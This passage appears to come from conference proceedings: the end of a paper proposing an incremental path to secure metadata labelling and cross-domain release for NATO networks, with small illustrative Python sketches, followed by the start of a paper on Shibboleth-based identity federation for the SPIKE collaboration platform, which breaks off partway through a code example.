standardized specification for conveying the meta-data is needed. NATO has proposed a standard<br />
based on XML labelling (Eggen 2010)(Oudkerk 2010). On 1 September 2009, POWDER (Protocol for<br />
Web Description Resources) became a W3C recommendation (POWDER 2009). The POWDER suite<br />
facilitates the publication of descriptions of (multiple) resources. The goal of the POWDER working<br />
group has been to develop a mechanism that allows not only the provision of descriptions but also a<br />
way to apply them to groups of (online) resources and for the authentication of those descriptions in<br />
relation to establishing a trust level of those descriptions.<br />
2.2 Possibilities of meta-information within a single network<br />
2.2.1 Information Lifecycle Management<br />
Information Lifecycle Management is about the different lifecycle phases that information can go<br />
through, from the creation of information, via different manipulations or updates to the deletion of<br />
information or at least archiving the information for future reference. Easily accessible meta-information<br />
can facilitate Information Lifecycle Management and create new possibilities. For example, with more<br />
meta-information available, information objects could also be archived for different reasons. For<br />
example, archive every file that was created by ‘Danielle Zeeg’ because she no longer works at the<br />
company, or archive every information object that has been tagged as ‘SFOR’ because that mission<br />
has ended.<br />
Similar to the archiving scenario, aiding users or administrators in searching for information can also<br />
benefit from having more meta-information available. For instance, search all information objects that<br />
carry the file extension ‘pdf’, were created in 2010, were authored by ‘Kees de Witte’ and have<br />
been tagged with ‘SFOR’.<br />
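Such archive and search criteria can be sketched as a simple filter over meta-information records. The field names (`extension`, `year`, `author`, `tags`) and the in-memory catalogue below are illustrative assumptions, not part of any labelling standard:

```python
# Minimal sketch: filtering information objects by their meta-information.
# Field names are illustrative; a real system would follow a standardised schema.

def matches(meta, extension=None, year=None, author=None, tag=None):
    """Return True if a meta-information record satisfies all given criteria."""
    if extension is not None and meta.get("extension") != extension:
        return False
    if year is not None and meta.get("year") != year:
        return False
    if author is not None and meta.get("author") != author:
        return False
    if tag is not None and tag not in meta.get("tags", ()):
        return False
    return True

catalogue = [
    {"name": "report.pdf", "extension": "pdf", "year": 2010,
     "author": "Kees de Witte", "tags": ["SFOR"]},
    {"name": "notes.txt", "extension": "txt", "year": 2010,
     "author": "Danielle Zeeg", "tags": []},
]

# Search: all 2010 PDF files authored by 'Kees de Witte' and tagged 'SFOR'.
hits = [m["name"] for m in catalogue
        if matches(m, extension="pdf", year=2010,
                   author="Kees de Witte", tag="SFOR")]

# Archive: everything created by 'Danielle Zeeg'.
to_archive = [m["name"] for m in catalogue if matches(m, author="Danielle Zeeg")]
```

The same predicate serves both use cases; only the criteria passed in differ.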
2.2.2 Integrity protection<br />
It is also possible to embed integrity protection capabilities in meta-information. For example,<br />
by creating a digital signature over the information, the signature can later be used to verify whether<br />
the information has been changed or to validate who created it. This kind of meta-information helps to protect information as<br />
any modifications to the information can be detected. If meta-information were to include integrity<br />
protection then users or administrators could for example find all data objects that were modified after<br />
the meta-information was generated. Another possibility would be to establish the trustworthiness of<br />
information by distinguishing between data objects that do or do not have integrity protection<br />
embedded in their meta-information.<br />
Meta-information can also be used for identification purposes. For example meta-information<br />
containing the type, manufacturer, location or capability of a specific hardware sensor deployed in the<br />
field can be used to select certain sensor feeds, i.e. select feeds of all sensors of type audio-sensor,<br />
or select feeds of all sensors that are located within a one-kilometre radius of GPS coordinate with<br />
latitude 50.84064 and longitude 4.35498.<br />
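The radius-based selection just described can be sketched with a great-circle distance computation. The sensor records and their coordinates are invented for illustration; only the reference point (latitude 50.84064, longitude 4.35498) comes from the text:

```python
import math

def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in kilometres between two WGS84 coordinates."""
    r = 6371.0  # mean Earth radius in km
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dp = math.radians(lat2 - lat1)
    dl = math.radians(lon2 - lon1)
    a = math.sin(dp / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dl / 2) ** 2
    return 2 * r * math.asin(math.sqrt(a))

# Hypothetical sensor meta-information records.
sensors = [
    {"id": "mic-1", "type": "audio", "lat": 50.8411, "lon": 4.3557},  # nearby
    {"id": "cam-7", "type": "video", "lat": 50.8504, "lon": 4.3488},  # wrong type
    {"id": "mic-2", "type": "audio", "lat": 51.2194, "lon": 4.4025},  # ~50 km away
]

# Select feeds of all audio sensors within a one-kilometre radius of the
# GPS coordinate from the text.
selected = [s["id"] for s in sensors
            if s["type"] == "audio"
            and haversine_km(50.84064, 4.35498, s["lat"], s["lon"]) <= 1.0]
```

Type and location here are just two meta-information attributes; any other attribute could be filtered the same way.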
2.3 Possibilities of meta-information in a federated domain<br />
The different types of meta-information discussed in the previous paragraph may also be used in a<br />
federated context, not only to regulate information flows between different domains but, as we shall<br />
see, for other purposes too.<br />
Although sharing information may be a main means of NNEC, not all information has to be shared. It<br />
may not be relevant or useful, or it cannot be shared due to limitations other than security. In other<br />
words we must be able to make intelligent decisions on which information is eligible for sharing. For<br />
example one may wish to share a photo but, due to bandwidth constraints, it is only possible to share it<br />
in a resolution lower than 800x600 pixels. Software may then be used to automatically scale the photo<br />
if it is too large. Another example is to share all recent information objects for which the author is “Jan<br />
de Bruin” because he is one of the planners of an important and complex mission. Many more<br />
examples can be conceived from operational needs: share feeds only from sensors of a certain<br />
type, such as audio; share images and videos made within a certain range of a GPS location with a<br />
team on a reconnaissance mission; select which information is sent to such a mission based on<br />
keywords; or determine the communication system to use based on an urgency statement in a<br />
document. Depending on the granularity and type of the meta-information the possibilities are virtually<br />
endless.<br />
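The bandwidth-constrained photo example can be sketched as a small decision function over the photo's meta-information. The 800×600 cap comes from the text; the `width`/`height` field names are assumptions:

```python
# Sketch: decide how to share a photo under a bandwidth-driven resolution cap.
MAX_W, MAX_H = 800, 600

def share_plan(meta):
    """Return ('as-is' | 'downscale', target_size) for a photo's meta-information."""
    w, h = meta["width"], meta["height"]
    if w <= MAX_W and h <= MAX_H:
        return "as-is", (w, h)
    # Preserve the aspect ratio while fitting inside the cap.
    scale = min(MAX_W / w, MAX_H / h)
    return "downscale", (int(w * scale), int(h * scale))

plan, size = share_plan({"width": 1600, "height": 1200})
```

Actual rescaling would be delegated to image-processing software; the meta-information only drives the decision.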
2.3.1 Secure labelled release<br />
Meta-information can also be used to protect, i.e. ensure that information is not shared. For example<br />
do not share objects for which the meta-information says that the creation date is the current month.<br />
Or do not share videos with a resolution higher than 640x480. Or do not share presentation files<br />
which are classified ‘NATO CONFIDENTIAL’ or higher. We address a specific case where criteria that<br />
are suitable for determining the releasability to another domain are carried in meta-information bound<br />
to an information object as secure labelled release.<br />
2.3.2 Dissemination of release information<br />
Between the duty-to-share and the duty-to-protect lies the practice of including meta-information<br />
to inform the recipient about any restrictions or responsibilities when processing or re-sharing<br />
the information. We refer to this as disseminating release information.<br />
These developments are not without consequences and pose certain security challenges. In particular,<br />
the binding of meta-information to information, and the protection of the integrity of (a) this binding, (b) the<br />
information and (c) the meta-information, have to be carefully designed. When meta-information is used<br />
in a sharing mechanism and a user on a local workstation can create meta-information, then the<br />
(integrity of the) workstation and its components become critical because an insecure or untrusted<br />
operating system might trick a user into sharing the wrong information. The required level of<br />
assurance depends largely on the level of security that needs to be attained but is also affected by the<br />
specific application of meta-data.<br />
There must also be a foundation on which to build the meta-information, such as a system to store and<br />
manage meta-information and to retrieve the meta-information given the information itself, or vice versa. And<br />
there are many other related challenges in handling data, e.g. how to handle conflicting sets of<br />
meta-information, how can meta-information be revoked or changed, and so on. These issues need to<br />
be addressed in an information management system 1 .<br />
3. Labelling: An incremental approach<br />
In the previous section we have seen that labelling has manifold purposes. The emphasis has mostly<br />
been on secure labelled release for exchanging information across different security domains. We<br />
propose an incremental approach in which partially related developments are tied together so that<br />
functionality enabled by labelling can be realised step-by-step. This has two main advantages. First, it<br />
makes the development process better organised and hence more efficient and cost-effective.<br />
Second, users and organisations can benefit from labelling directly, because the new<br />
functionality can be used as soon as each step is completed. This is also beneficial for the user experience.<br />
To achieve this incremental approach, a clear overview is needed of which steps must be taken to<br />
realise each piece of intermediate functionality whilst ensuring that the ultimate goal, which is also the<br />
most complex, can still be reached. In this section we propose a plan to achieve the secure labelled<br />
release in a series of smaller, incremental steps that add useful functionality to existing or new<br />
processes. We distinguish four phases:<br />
1. Information lifecycle management<br />
2. Disseminating cross-domain information<br />
3. Integrity protection<br />
4. Secure labelled release.<br />
3.1 Information lifecycle management<br />
In this context, labelling functionality is used to improve information management within a single<br />
information domain. A user may add additional meta-information to an information object, such as the<br />
author, title, publication date, classification – the possibilities are virtually endless. This enables<br />
various management functionality to be used on the document as discussed in Section 2, including<br />
archiving, searching, and deleting information.<br />
1 An information management system comprises more aspects than a content management system, which is merely a container<br />
to store and share information within a single domain.<br />
The security requirements are minimal, as the binding between the document and the label is weak at<br />
this point. Basically the label only needs to contain a reference to the original document. Within an<br />
information domain, it could be used for enforcing need-to-know separation or communities of<br />
interest. Figure 2 shows an abstraction of the functionality needed for this approach.<br />
[Figure: a workstation running a labelling application, storing labels and documents in an information management system]<br />
Figure 2: Labelling for information lifecycle management purposes<br />
Essentially, the architecture for this set-up contains only two main aspects:<br />
- An application that can create labels.<br />
- An information management system: an environment or system that can be used to store information and labels together.<br />
When a user creates information, the labelling application can be used to link several attributes to the<br />
information. The information and the label will both be stored in the information management system<br />
(IMS). The user may disseminate the information either through the IMS or by separate means. The<br />
IMS can in the latter case be used to retrieve the label when the information is presented.<br />
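The IMS role described above can be sketched as a store that keys labels by a digest of the information itself, so the label can be retrieved later when only the information is presented. The class and field names are illustrative assumptions:

```python
import hashlib

class InformationManagementSystem:
    """Toy IMS: stores labels keyed by a SHA-256 digest of the information,
    so the label can be looked up when only the information is presented."""

    def __init__(self):
        self._labels = {}

    @staticmethod
    def _key(document: bytes) -> str:
        return hashlib.sha256(document).hexdigest()

    def store(self, document: bytes, label: dict) -> None:
        """Store the information's label alongside the information."""
        self._labels[self._key(document)] = label

    def label_for(self, document: bytes):
        """Retrieve the label for a given piece of information, if known."""
        return self._labels.get(self._key(document))

ims = InformationManagementSystem()
doc = b"operational report, March 2011"
ims.store(doc, {"author": "Jan de Bruin", "classification": "UNCLASSIFIED"})
found = ims.label_for(doc)
```

Keying by content digest means the lookup still works when the document reaches the IMS by separate means, matching the dissemination scenario above.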
3.2 Disseminating cross-domain information<br />
We can extend the information lifecycle management functionality so that it is possible to inform a<br />
recipient of information in another information domain about the way the information should be<br />
treated; e.g. under what memorandum of understanding it is exchanged or what classification is<br />
attached to the information. In this case when a user sends the information to a recipient, the label<br />
with the necessary meta-information has to be sent as well. This is mostly intended for<br />
information sharing across different information domains, where each information domain has the<br />
same or a very similar security policy. The label here has an informative, procedural aim and does not<br />
necessarily form a technical enforcement.<br />
[Figure: a workstation with a labelling application; labels and documents are stored in an information management system, and a release mechanism forwards the document with its label to another domain]<br />
Figure 3: Labelling for disseminating cross-domain information<br />
In this setup we add a third element, namely the release mechanism. Essentially, the other elements<br />
stay the same. This release mechanism has a two-fold purpose. The first is to verify that a suitable<br />
label accompanies the information and if not, try to retrieve the label from the information<br />
management system. The suitability is established by validating that all the necessary information is<br />
present. The second purpose is the ability to translate an internal label into an external label. For<br />
example, certain elements may be removed from the document (such as the name of the author), or<br />
other information may be added (e.g. the date of information exchange), or a different labelling<br />
structure may be used for internal and external purposes 2 .<br />
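Internal-to-external label translation can be sketched as a simple transformation over the label's fields. Dropping the author field and adding an exchange date follow the examples in the text; the field names themselves are assumptions:

```python
from datetime import date

def translate_label(internal: dict) -> dict:
    """Derive an external label from an internal one: drop internal-only
    fields (here, the author) and add exchange-specific ones (the date of
    information exchange)."""
    external = {k: v for k, v in internal.items() if k != "author"}
    external["exchange_date"] = date.today().isoformat()
    return external

internal = {"author": "Kees de Witte",
            "classification": "NATO RESTRICTED",
            "title": "Sensor placement"}
external = translate_label(internal)
```

A production release mechanism would drive such a transformation from a configurable policy rather than hard-coded field names.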
3.3 Integrity protection<br />
The third step in extending the labelling architecture is to realise integrity protection of information.<br />
Integrity protection refers to the means to establish whether a document is authentic or has been<br />
changed. And as a secondary benefit, it may be established who assessed the authenticity.<br />
The label has to be extended to include a secure binding to link the information and the label together,<br />
in such a way that it can always be detected if an existing label is attached to other (different or<br />
altered) information, or if the label content has been changed. Making a change to an information<br />
object can be detected because that would result in a different object.<br />
For the binding to be secure we need cryptographic support. One method of realising this, amongst<br />
others, is through a PKI. A user uses a private key to sign the binding in the label, which also links the<br />
binding directly to the user; that is, it can easily be determined who created the label. To validate<br />
the integrity of the document, the public key of the user that created the binding can be used to verify<br />
the binding in the label. In case any changes have been made, the verification will fail.<br />
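The sign-then-verify flow can be sketched with Python's standard library. Note that `hmac` with a shared key is used here purely as a stand-in for the private/public-key signature a real deployment would implement with a PKI; the key and field names are assumptions:

```python
import hashlib
import hmac

# Stand-in for the labeller's private key; a real system would sign with a
# PKI private key and verify with the corresponding certificate.
KEY = b"stand-in for the labeller's private key"

def bind(document: bytes, label: dict) -> bytes:
    """Create a secure binding over the document digest and the label content."""
    payload = hashlib.sha256(document).digest() + repr(sorted(label.items())).encode()
    return hmac.new(KEY, payload, hashlib.sha256).digest()

def verify(document: bytes, label: dict, binding: bytes) -> bool:
    """Fails if the document, the label, or the binding itself was changed."""
    return hmac.compare_digest(bind(document, label), binding)

doc = b"aerial photograph, sector 4"
label = {"classification": "NATO CONFIDENTIAL"}
binding = bind(doc, label)

ok = verify(doc, label, binding)                       # untouched: verifies
tampered = verify(doc + b"!", label, binding)          # altered document: fails
relabelled = verify(doc, {"classification": "UNCLASSIFIED"}, binding)  # altered label: fails
```

Because the binding covers both the document digest and the label content, a change to either one invalidates it, which is exactly the detection property described above.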
[Figure: as Figure 3, extended with a PKI providing certificates and a CRL, a trusted OS on the workstation, and a release mechanism combined with an IEG]<br />
Figure 4: Labelling for integrity protection<br />
For a high assurance environment 3 , we also need to ensure that the labelling process works correctly.<br />
In other words we must have a level of assurance that the information the user actually labelled is the<br />
correct information and has not been modified unbeknownst to the user during the process. We<br />
cannot attain that level of assurance on a normal platform (operating system); therefore we need an<br />
operating system or platform that can provide us the needed assurance. This has been named a<br />
trusted operating system. Essentially, each step in the process of labelling must be carried out under<br />
2 Note that the release mechanism does not comprise the entire interconnection here; there may be other elements needed too,<br />
for instance cryptographic units or firewalls to ensure a secure connection.<br />
3 For instance information domains which process highly classified information.<br />
conditions that are guaranteed by the operating system, but on the other hand a user must also be<br />
capable of performing his regular tasks on the same platform. We see opportunities to establish this<br />
based on a virtualisation layer on top of a minimal but trusted core operating system. One virtual<br />
machine will provide the normal functionality and a second will run the labelling application under strict<br />
limitations; this concept is further elaborated upon in (Verkoelen 2010).<br />
An architecture of a workstation that is suitable for creating labels in a trusted manner is shown in<br />
Figure 5 (Hartog 2010). In essence, this is a virtualisation platform with two virtual machines. One is<br />
used as a workstation with the common applications. The other is used specifically for labelling and<br />
is focussed on binding a label to a given information object in such a way that the process cannot be<br />
disrupted and assurance can be given that only the provided information object is labelled and<br />
nothing else. The information to be labelled has to be exported from the generic to the specific virtual<br />
machine where a label can be created. Then the label can be transferred back to the workstation.<br />
[Figure: a workstation consisting of a desktop virtual machine and a labelling virtual machine, both running on a high assurance platform on top of the hardware]<br />
Figure 5: Architecture of a workstation for trusted labelling<br />
The needed level of assurance is created by a high assurance platform (HAP). The core component<br />
can therefore be a separation kernel (Rushby 1981; Information Assurance Directorate 2007), which<br />
is in control of all resources in the system and all communication between the virtual machines. The<br />
virtualisation is layered on top of the HAP. In certain cases with high assurance requirements, specific<br />
hardware may have to be used, but mostly the platform can be based on generic hardware.<br />
3.4 Secure labelled release<br />
The final objective of this incremental approach is the secure labelled release. The label can then be<br />
used to validate the suitability of exchanging a document across different security domains where the<br />
security policies of the domains may be different. The suitability is determined by different meta-information<br />
stored in a protected label. This could for example refer to the classification of the<br />
information in the document, but may also refer to capabilities of the source of the information<br />
(Smulders 2010), such as the quality of the camera used to take an aerial photograph, or the range of a<br />
radar. And of course combinations are also possible. The validation takes place at the border of the<br />
information domain. The label is intended for internal usage, and does not have to be included after<br />
the information has been released. However, it is also possible to translate the label for use as in<br />
the case of “disseminating release information”.<br />
To extend the integrity protection set-up to a full secure labelled release setup we have to add an<br />
extended release mechanism. This extension is twofold. In the first place the release mechanism<br />
must be capable of integrating with the PKI to validate the authenticity of the label and match it<br />
against the document. The release mechanism has to validate the certificate of the user that created<br />
the label (by way of, for example, a CRL) and ascertain the integrity of the document so that it can be<br />
established that the label matches the document and the label is valid.<br />
[Figure: as Figure 4, with trusted OSes on both the labelling workstation and the release mechanism, and the release mechanism checking certificates and the CRL against the PKI]<br />
Figure 6: Secure labelled release<br />
In the second place, since the release mechanism is now a security device that mediates between<br />
different security domains, it is necessary to raise the assurance of the correct behaviour of this<br />
platform. Therefore it is necessary to introduce a trusted platform for this element as well. In contrast<br />
to what is needed on the workstation, this system is dedicated to a single task; hence the<br />
operating system only has to ascertain the correct working of that platform, and this is therefore a different<br />
form of trusted OS.<br />
To determine whether the document is suitable for release the contents of the label have to be<br />
matched against a policy; each of the criteria in the label may affect the decision of the release<br />
mechanism. A simplified policy could for example be “all documents with a classification of<br />
Unclassified or NATO Restricted may be released”; and “all images with a resolution less than<br />
800×600 may be released”. A real policy may actually be quite complex to establish. Important issues<br />
are establishing the completeness and consistency of the release policy.<br />
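The simplified policy quoted above can be sketched as a small evaluation function. The label field names (`classification`, `type`, `resolution`) are assumptions; the two rules come directly from the text:

```python
# Sketch of the simplified release policy from the text: documents classified
# Unclassified or NATO Restricted may be released, and images additionally
# only if their resolution is less than 800x600.

RELEASABLE = {"UNCLASSIFIED", "NATO RESTRICTED"}

def may_release(label: dict) -> bool:
    """Evaluate the release policy against the meta-information in a label."""
    if label.get("classification", "").upper() not in RELEASABLE:
        return False
    if label.get("type") == "image":
        w, h = label.get("resolution", (0, 0))
        if w >= 800 or h >= 600:
            return False
    return True

doc_ok  = may_release({"classification": "NATO Restricted", "type": "document"})
img_ok  = may_release({"classification": "Unclassified", "type": "image",
                       "resolution": (640, 480)})
img_big = may_release({"classification": "Unclassified", "type": "image",
                       "resolution": (1024, 768)})
secret  = may_release({"classification": "NATO CONFIDENTIAL"})
```

A real policy would combine many more criteria, which is precisely why the text flags completeness and consistency of the policy as the hard problems.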
3.5 Functional building blocks<br />
This section has shown four situations in which meta-information encapsulated in a label adds<br />
useful functionality to existing or new processes. For these different applications we have shown the<br />
functional building blocks needed to realise them. This section provides an overview of the<br />
relation between the different applications and functional building blocks and also shows the essential<br />
components within each functional building block.<br />
Figure 7 provides an overview of the relation between the different applications and functional building<br />
blocks. From the left to the right the figure describes an incremental approach to obtain more complex<br />
application functionality with the use of the functional building blocks discussed in Section 3. We<br />
distinguish four basic building blocks:<br />
- A labelling mechanism that can be used to construct meta-information.<br />
- A release mechanism that controls under which conditions information can be shared with other domains.<br />
- A trusted OS to attain the required level of assurance.<br />
- A PKI to ascertain the binding between the label and the information object.<br />
[Figure: four columns showing the incremental growth of the building blocks, from information lifecycle management (labelling with label creation), via disseminate release information (adding a release mechanism with verification and label translation), and integrity protection (adding a PKI and a trusted OS with secure binding, smartcard authentication, certificate validation, secure login and HAP), to secure labelled release (all four building blocks, with authorisation and verification in the release mechanism)]<br />
Figure 7: An incremental approach to introduce labelling<br />
Each functional building block can consist of several components which have to be implemented<br />
depending on the functionality we require. When these requirements increase, additional functional<br />
building blocks are required and the complexity of the building blocks may increase as more<br />
components are added. As such we have established an incremental approach in which we add<br />
complexity in small steps while in the meantime creating new, useful functionality.<br />
The first basic step to use labelling is to implement a system which can create labels and utilise these<br />
labels in an (existing or new) Information Management System to manage information. When all the<br />
processes and procedures are in place and people are used to working with this new form of information<br />
management, it can be decided to extend the labelling with more functionality. A next step can be to<br />
implement a release mechanism which can decide to translate internal labels into external labels and<br />
share these labels with other domains. To ensure the integrity of the data object and metadata object,<br />
PKI and trusted OS functionality can be added. In the end, all four functional building blocks are in<br />
place, resulting in a “secure labelled release” application.<br />
Each step brings additional advantages: reduced complexity, time for people to experience and use the<br />
new functionality, incremental change of processes and procedures, and better acceptance of the<br />
functionality in the organisation.<br />
4. Conclusion<br />
Labelling is an important step to provide the technical means to realise a NEC environment and<br />
implement a duty-to-share mechanism. Not only does it allow the sharing of information, it also<br />
realises a basis so that the information owner can remain in control of which information is shared.<br />
Creation of labels in itself is not a difficult process, nor is the validation of the correctness of such a<br />
label. Most of the means for these are already in place e.g. in the form of PKI. Assurance is a totally<br />
different criterion. To attain the right level it is vital to ascertain that the label is attached correctly to<br />
the right information. Hence it requires many additional controls to achieve that certainty. Crucial in<br />
that aspect is the choice of a platform as this is the basis for assurance.<br />
Implementing labelling for a high-security environment is a costly and long-term development. In the<br />
long run it can be a very useful technique for exchanging information across different security<br />
domains, but in the short term obtaining results is difficult. However,<br />
encapsulating meta-data in a label can be useful for many other purposes as well. We argued that<br />
these aspects can be combined to develop a labelling solution that in the end delivers a cross-domain<br />
solution, but in the meantime is useful for several other purposes. We have proposed<br />
an incremental approach to create a cross-domain solution.<br />
By starting with labelling for information management purposes, we can quickly gain results as it can<br />
make accessing the right information easier. This can be extended with limited effort to support a<br />
method to exchange release information with other domains having a similar security policy. This way,<br />
not only have we provided the technical basis for labelling, but we have also prepared the users to<br />
work with labels and appreciate their purpose. The third step in this process can be to implement<br />
integrity protection, which requires raising the assurance of the label creation process. And<br />
finally we reach a true cross-domain solution if we raise the assurance on the validation side as<br />
well. Nevertheless, careful planning and a solid overview of each individual<br />
step, as well as of the whole, are necessary to reach the goal. On the other hand, implementing a cross-domain<br />
solution in one big step may be just a bridge too far.<br />
5. Future work<br />
The proposed means to realise a cross domain solution can be further extended with other<br />
functionality. These require further research to determine feasibility and technical means to realise<br />
them.<br />
- Fine-grained control over information, e.g. labels on individual chapters or paragraphs.<br />
- Automatic labelling of information; for instance, information from sensors such as radar or cameras can be automatically labelled, depending on both the content and the capabilities used to generate the information.<br />
- Integration of applications and labelling, so that the user can control the process of labelling (semi-)automatically from the applications.<br />
- Lifecycle management of information, e.g. use of labels to express changes in the information.<br />
- Cross-domain solutions; using different labels can be a very useful technique to exchange information across different security domains. Based on a domain policy, external labels can be translated into an internal label which is understandable within the domain.<br />
- Methodology for policy development. A core concept of an automated release mechanism is enforcing a policy; creating a usable policy is a complex task, hence a methodology to develop policies based on all rules and agreements is needed to ensure their completeness and consistency.<br />
6. References<br />
Buckman, T. (2005) “NATO Network Enabled Capability Feasibility Study – Executive Summary”, [online] version<br />
2.0, NC3A, http://www.dodccrp.org/files/nnec_fs_executive_summary_2.0_nu.pdf<br />
Schotanus, H.A., Boonstra, D. and te Paske, B.J. (2009) “Information Labeling – Cross- Domain Solutions”,<br />
Intercom Vereniging Officieren Verbindingsdienst, 38th year, No. 2<br />
Martis, E.R., et al. (2006) “Information Assurance : Trendanalysis”, TNO report TNO-D&V 2006 B312<br />
Eggen, A., et al. (2010) “Binding of Metadata to Data Objects – A proposal for a NATO specification”, Norwegian<br />
Defence Research Establishment (FFI) & NC3A<br />
Hartog, T., Degen, A.J.G. and Schotanus, H.A. (2010) “High assurance platform for labelling solutions”, TNO<br />
Information and Communication Technology<br />
Rushby, J. (1981) “Design and Verification of Secure Systems”, ACM Operating Systems Review, Vol. 15, No. 5,<br />
pp 12-21, http://www.csl.sri.com/papers/sosp81/sosp81.pdf<br />
Smulders, A.C.M. (2010) “Rubriceren bottleneck voor informatiedeling”, Intercom Vereniging Officieren<br />
Verbindingsdienst, 39th year, No. 1, pp 33-34<br />
Verkoelen, C.A.A., et al. (2010) “Security shift in future network architectures”, information assurance and cyber<br />
defence; NATO RTO IST 091<br />
Information Assurance Directorate (2007), “U.S. Government Protection Profile for Separation Kernels in<br />
Environments Requiring High Robustness”, version 1.03, http://www.niap-ccevs.org/pp/pp_skpp_hr_v1.03.pdf<br />
Oudkerk, S., et al. (2010) “A Proposal for an XML Confidentiality Label Syntax and Binding of Metadata to Data<br />
Objects”, information assurance and cyber defence, NATO RTO IST 091<br />
W3C, POWDER: Protocol for Web Description Resources, 1 September 2009, http://www.w3.org/2007/powder/<br />
Information Management Security for Inter-Organisational<br />
Business Processes, Services and Collaboration<br />
Maria Semmelrock-Picej 1 , Alfred Possegger 2 and Andreas Stopper 2<br />
1 eBusiness Institute, Klagenfurt University, Austria<br />
2 Infineon IT-Services GmbH Austria, Austria<br />
Maria.Semmelrock-Picej@aau.at<br />
Alfred.Possegger@infineon.com<br />
Andreas.Stopper@infineon.com<br />
Abstract: Web-based collaborations and cross-organizational processes typically require dynamic and context-based<br />
interactions between the involved parties and services. Due to the temporary nature of collaboration and the<br />
evolving competencies of the involved companies over time, security issues like trust, privacy and identity<br />
management are of high interest for the long-lasting success of virtual collaborations. This paper addresses this<br />
issue by presenting some results of an international research project. The vision of this project is to implement a<br />
virtual cooperation system for SMEs to be used for realizing competitive advantages through virtual cooperations.<br />
The paper describes some results of this system. In particular, we discuss issues concerned with identity<br />
management. Identity federation is one of the key concepts of SPIKE to support “virtual organizations”, their fast<br />
setup, comfortable maintenance and orderly closing. This paper describes the mechanisms by which<br />
collaboration partners registered at the SPIKE platform are authenticated using a standardized identity<br />
federation protocol, Shibboleth. It is shown how the identity data of a company using its own IDMS can be<br />
integrated into the SPIKE platform and what a company has to set up from a technical point of view so that its<br />
employees can be authenticated via Shibboleth. Further, an approach is presented that is suitable mainly for SMEs<br />
which do not have their own IDMS.<br />
Keywords: eCollaboration, security, identity management, phases of cooperation<br />
1. Introduction<br />
Nowadays competition is no longer between single enterprises but among supply chains with numerous<br />
actors. Effective supply chain management has therefore become a potentially valuable way of<br />
securing a competitive advantage and improving organizational performance. Firms are seeking<br />
synergistic combinations of resources and changing their roles and value positions through digital<br />
collaborations (Klein, Rai and Straub 2007). However, the understanding of how this works and which areas<br />
are most important for success is still incomplete.<br />
It has been noted in literature that information and communication technologies have a significant<br />
impact on the economic situation and knowledge-based activities in peripheral regions. Especially for<br />
SMEs in the cross-border region of Carinthia and Slovenia, (Ziener 2010) identified a low rate of<br />
internationalization, a small number of cross-border supply chain networks, and activities limited to<br />
regional borders.<br />
ICTs support collaboration among people with different competencies and capabilities in virtual<br />
collaborations (Mohrmann et al. 2003), facilitate knowledge access and sharing (Davenport and<br />
Prusak 1998) and enable the codification and dissemination of explicit knowledge (Zack 1999). Virtual<br />
collaboration also increases the knowledge about who knows what, enabling virtual joint work and<br />
supporting the easier and faster setup of short-term, project-based and loosely coupled chains among<br />
participants. Accordingly, studies have shown that the participation of small and medium-sized<br />
enterprises in eCollaboration environments could improve their situation in peripheral regions.<br />
However, despite the general agreement on the positive impacts of virtual collaborations, detailed<br />
micro-level evidence on the preconditions and success factors is limited. Yet it has been shown that the<br />
way SMEs interact in collaborative environments depends to a large extent on the security<br />
functionalities and their management, which impact almost all knowledge-related activities as a basic<br />
precondition. In other words, existing work typically narrows down to very specific processes or activities.<br />
This contribution emphasizes the potential of ICTs and their fundamental role in creating a<br />
virtual dimension through which companies can share and create new knowledge at both the tacit and<br />
explicit level.<br />
Maria Semmelrock-Picej et al.<br />
Companies have serious privacy concerns about how their information is used, disclosed and<br />
protected, and about the degree of control they have over the dissemination of this information. In<br />
particular, they are concerned about possible undesirable economic consequences resulting from a misuse of<br />
such information. Indeed, many companies express concern about the privacy and identity<br />
management and research suggests that identity management is of focal concern to companies.<br />
Identity Management is a hot area, experiencing considerable growth and gets more and more one of<br />
the challenging key disciplines an IT department of a midsize to large enterprise has to ise (Jackson<br />
2010). It is not surprising because organizations, supply chains and customers have been tightly<br />
connected together in digital networked economy. Another important aspect is that of identity theft<br />
and misuse, leading to serious damages within enterprises and also in the Internet development.<br />
The major contribution of this paper lies in revealing and discussing the identity federation approach<br />
and its impact on trust in collaborative environments. In doing so, this paper shows, based on the<br />
standardized Shibboleth protocol, how the identity data of a company can be integrated when taking<br />
part in collaborations. The second contribution of this paper is in identifying the requirements of the<br />
smallest companies in this field. When these issues are discussed in an enterprise context, mostly midsize<br />
to large enterprises are the focus of consideration. This paper presents solutions which bridge<br />
this gap by offering the necessary functionality to the smallest companies as well. These findings should<br />
enable very small companies to also start collaborating virtually.<br />
2. The SPIKE project<br />
2.1 Introduction<br />
SPIKE, as a virtual infrastructure, aims at researching and implementing a virtual collaboration<br />
platform. In order to reach this goal, SPIKE’s security infrastructure is highly reliable and adaptive<br />
and consists of the following layers (see Figure 1) (Semmelrock-Picej and Possegger 2010):<br />
A: Network Enterprise Layer – at level A, different companies offer their particular tacit and explicit<br />
knowledge, expertise, resources and skills. All involved companies are characterized by a number<br />
of criteria such as strategic position, company size, market, location, and so on.<br />
B: Conceptual SPIKE Layer – the Service Mediator of this layer combines all provided tangible<br />
and intangible resources and coordinates them according to the requirements of the market,<br />
which then form a new product (see Figure 1 B).<br />
Level B also consists of mapping instruments to assign involved companies and their services and<br />
capabilities to the tasks of the business process. This layer particularly supports the selection,<br />
orchestration, management and execution of several kinds of services in a controlled way.<br />
2.2 Security functions in SPIKE<br />
When participating in the SPIKE platform, companies/users first state their identity. The system then validates the<br />
user’s claimed identity (authentication). Both steps precede access control, which aims at preventing<br />
unauthorized use of a resource as well as use of resources in an unauthorized way.<br />
As identities in virtual cooperations are not anonymous, trust and reputation mechanisms are key<br />
to the success of open, dynamic and service-oriented virtual collaborations: they build social trust among<br />
the persons involved and are therefore the best strategy to sustain virtual<br />
cooperation. However, this trust is based on repeated interactions, which can succeed or fail.<br />
A key aspect of our approach is therefore the permanent analysis and evaluation of<br />
interactions, from which trust is determined automatically.<br />
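The text does not specify how trust is computed from interaction outcomes. A minimal sketch, assuming<br />
trust is the Laplace-smoothed fraction of successful past interactions (so that new partners start at a<br />
neutral 0.5), could look as follows; the class and method names are our own and not part of SPIKE:<br />

```python
class TrustTracker:
    """Derive a trust score from the outcomes of repeated interactions.

    Hypothetical sketch: trust is the Laplace-smoothed fraction of
    successful interactions, so new partners start at a neutral 0.5.
    """

    def __init__(self):
        self.successes = 0
        self.failures = 0

    def record(self, success: bool) -> None:
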